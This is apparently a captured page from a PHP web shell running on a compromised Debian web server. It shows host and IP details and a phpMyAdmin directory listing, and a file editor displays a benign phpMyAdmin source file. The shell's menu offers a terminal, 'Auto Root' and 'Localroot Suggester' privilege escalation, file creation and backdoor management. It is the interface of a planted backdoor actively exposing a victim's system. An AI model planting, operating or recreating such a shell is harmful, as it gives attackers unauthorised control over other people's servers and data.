Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
phpmyadmin /
Delete
Unzip
Name
Size
Permission
Date
Action
doc
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
js
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
libraries
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
locale
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
sql
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
templates
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
themes
[ DIR ]
drwxr-xr-x
2025-06-07 11:58
autoload.php
76.25
KB
-rw-r--r--
2025-04-08 15:25
config.sample.inc.php
4.7
KB
-rw-r--r--
2023-02-07 21:35
favicon.ico
21.96
KB
-rw-r--r--
2023-02-07 21:35
index.php
1.05
KB
-rw-r--r--
2023-02-07 21:35
robots.txt
26
B
-rw-r--r--
2023-02-07 21:35
show_config_errors.php
1.13
KB
-rw-r--r--
2023-02-07 21:35
url.php
965
B
-rw-r--r--
2023-02-07 21:35
Save
Rename
<?php /** * Simple wrapper just to enable error reporting and include config */ declare(strict_types=1); if (! defined('ROOT_PATH')) { // phpcs:disable PSR1.Files.SideEffects define('ROOT_PATH', __DIR__ . DIRECTORY_SEPARATOR); // phpcs:enable } // rfc2616 - Section 14.21 header('Expires: ' . gmdate(DATE_RFC1123)); // HTTP/1.1 header('Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'); header('Pragma: no-cache'); // HTTP/1.0 // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) header('Last-Modified: ' . gmdate(DATE_RFC1123)); header('Content-Type: text/html; charset=utf-8'); // phpcs:disable PSR1.Files.SideEffects define('PHPMYADMIN', true); // phpcs:enable require ROOT_PATH . 'libraries/constants.php'; // issue #16256 - This only works with php 8.0+ if (function_exists('error_reporting')) { error_reporting(E_ALL); } /** * Read config file. */ if (is_readable(CONFIG_FILE)) { /** @psalm-suppress MissingFile */ include CONFIG_FILE; }